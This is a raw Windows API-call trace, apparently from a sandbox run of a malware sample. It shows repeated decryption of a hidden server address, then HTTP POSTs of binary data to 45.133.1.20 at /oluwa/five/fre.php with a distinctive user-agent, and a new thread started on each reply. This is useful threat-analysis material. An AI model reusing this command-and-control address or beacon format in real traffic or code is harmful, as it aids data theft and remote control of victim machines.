LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.928] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.928] GetProcessHeap () returned 0x6a0000 [0235.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da038 | out: hHeap=0x6a0000) returned 1 [0235.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.932] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0235.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.933] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0235.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.934] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0235.934] GetProcessHeap () returned 0x6a0000 [0235.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0235.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.936] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0235.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.937] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0235.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.938] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0235.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.939] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0235.940] GetProcessHeap () returned 0x6a0000 [0235.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0235.940] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0235.940] GetProcessHeap () returned 0x6a0000 [0235.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0235.941] GetProcessHeap () returned 0x6a0000 [0235.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0235.941] GetProcessHeap () returned 0x6a0000 [0235.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0235.942] GetProcessHeap () returned 0x6a0000 [0235.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0235.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.943] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.950] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0235.957] GetProcessHeap () returned 0x6a0000 [0235.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0235.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.958] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0235.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.959] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.961] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.961] GetProcessHeap () returned 0x6a0000 [0235.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0235.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.963] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0235.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.964] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0235.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.965] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0235.965] GetProcessHeap () returned 0x6a0000 [0235.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0235.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.966] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0235.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.967] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0235.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.969] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0235.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.970] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0235.970] GetProcessHeap () returned 0x6a0000 [0235.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0235.970] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0235.970] GetProcessHeap () returned 0x6a0000 [0235.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0235.970] socket (af=2, type=1, protocol=6) returned 0x75c [0235.971] connect (s=0x75c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0235.995] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0235.995] GetProcessHeap () returned 0x6a0000 [0235.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0235.995] GetProcessHeap () returned 0x6a0000 [0235.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da6f0 [0235.996] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0235.997] wvsprintfA (in: param_1=0x6da6f0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0235.997] GetProcessHeap () returned 0x6a0000 [0235.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0235.997] GetProcessHeap () returned 0x6a0000 [0235.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0235.998] GetProcessHeap () returned 0x6a0000 [0235.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0235.998] GetProcessHeap () returned 0x6a0000 [0235.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da6f0 [0235.999] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0236.000] wvsprintfA (in: param_1=0x6da6f0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0236.000] GetProcessHeap () returned 0x6a0000 [0236.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0236.000] GetProcessHeap () returned 0x6a0000 [0236.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0236.001] send (s=0x75c, buf=0x6bd460*, len=242, flags=0) returned 242 [0236.002] send (s=0x75c, buf=0x6bb998*, len=159, flags=0) returned 159 [0236.002] GetProcessHeap () returned 0x6a0000 [0236.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0236.002] recv (in: s=0x75c, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0236.076] GetProcessHeap () returned 0x6a0000 [0236.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0236.076] GetProcessHeap () returned 0x6a0000 [0236.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0236.077] GetProcessHeap () returned 0x6a0000 [0236.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0236.077] GetProcessHeap () returned 0x6a0000 [0236.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0236.077] closesocket (s=0x75c) returned 0 [0236.078] GetProcessHeap () returned 0x6a0000 [0236.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0236.078] GetProcessHeap () returned 0x6a0000 [0236.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0236.078] GetProcessHeap () returned 0x6a0000 [0236.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0236.078] GetProcessHeap () returned 0x6a0000 [0236.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0236.079] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1490) returned 0x75c [0236.081] Sleep (dwMilliseconds=0xea60) [0236.082] GetProcessHeap () returned 0x6a0000 [0236.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0236.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.083] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.088] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0236.094] GetProcessHeap () returned 0x6a0000 [0236.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0236.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.096] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0236.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.097] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.098] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.098] GetProcessHeap () returned 0x6a0000 [0236.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0236.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.099] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0236.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.101] CryptDestroyKey (hKey=0x6ad060) returned 1 [0236.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.101] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0236.101] GetProcessHeap () returned 0x6a0000 [0236.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0236.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.102] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0236.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.103] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0236.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.104] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0236.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.105] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0236.105] GetProcessHeap () returned 0x6a0000 [0236.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0236.105] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0236.106] GetProcessHeap () returned 0x6a0000 [0236.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0236.106] GetProcessHeap () returned 0x6a0000 [0236.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0236.107] GetProcessHeap () returned 0x6a0000 [0236.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0236.107] GetProcessHeap () returned 0x6a0000 [0236.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0236.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.112] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.117] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0236.123] GetProcessHeap () returned 0x6a0000 [0236.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0236.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.124] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0236.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.125] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.126] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.126] GetProcessHeap () returned 0x6a0000 [0236.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0236.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.127] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0236.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.128] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0236.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.129] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0236.129] GetProcessHeap () returned 0x6a0000 [0236.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0236.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.130] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0236.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.131] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0236.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.132] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0236.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.133] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0236.133] GetProcessHeap () returned 0x6a0000 [0236.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0236.133] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0236.133] GetProcessHeap () returned 0x6a0000 [0236.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0236.134] socket (af=2, type=1, protocol=6) returned 0x760 [0236.134] connect (s=0x760, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0236.161] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0236.176] GetProcessHeap () returned 0x6a0000 [0236.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0236.176] GetProcessHeap () returned 0x6a0000 [0236.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da6f0 [0236.177] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0236.178] wvsprintfA (in: param_1=0x6da6f0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0236.178] GetProcessHeap () returned 0x6a0000 [0236.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9930 [0236.178] GetProcessHeap () returned 0x6a0000 [0236.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0236.179] GetProcessHeap () returned 0x6a0000 [0236.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0236.179] GetProcessHeap () returned 0x6a0000 [0236.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da6f0 [0236.180] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0236.181] wvsprintfA (in: param_1=0x6da6f0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0236.181] GetProcessHeap () returned 0x6a0000 [0236.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0236.181] GetProcessHeap () returned 0x6a0000 [0236.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0236.182] send (s=0x760, buf=0x6bd460*, len=242, flags=0) returned 242 [0236.183] send (s=0x760, buf=0x6bb998*, len=159, flags=0) returned 159 [0236.183] GetProcessHeap () returned 0x6a0000 [0236.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0236.183] recv (in: s=0x760, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0236.254] GetProcessHeap () returned 0x6a0000 [0236.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0236.255] GetProcessHeap () returned 0x6a0000 [0236.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0236.255] GetProcessHeap () returned 0x6a0000 [0236.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9930 | out: hHeap=0x6a0000) returned 1 [0236.257] GetProcessHeap () returned 0x6a0000 [0236.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0236.258] closesocket (s=0x760) returned 0 [0236.259] GetProcessHeap () returned 0x6a0000 [0236.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0236.259] GetProcessHeap () returned 0x6a0000 [0236.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0236.260] GetProcessHeap () returned 0x6a0000 [0236.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0236.260] GetProcessHeap () returned 0x6a0000 [0236.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0236.261] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1494) returned 0x760 [0236.264] Sleep (dwMilliseconds=0xea60) [0236.266] GetProcessHeap () returned 0x6a0000 [0236.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0236.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.267] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.281] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0236.294] GetProcessHeap () returned 0x6a0000 [0236.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6da068 [0236.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.298] CryptImportKey (in: hProv=0x6bf278, pbData=0x6da068, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0236.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.300] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.301] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.301] GetProcessHeap () returned 0x6a0000 [0236.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da068 | out: hHeap=0x6a0000) returned 1 [0236.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.303] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0236.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.308] CryptDestroyKey (hKey=0x6ad020) returned 1 [0236.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.310] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0236.310] GetProcessHeap () returned 0x6a0000 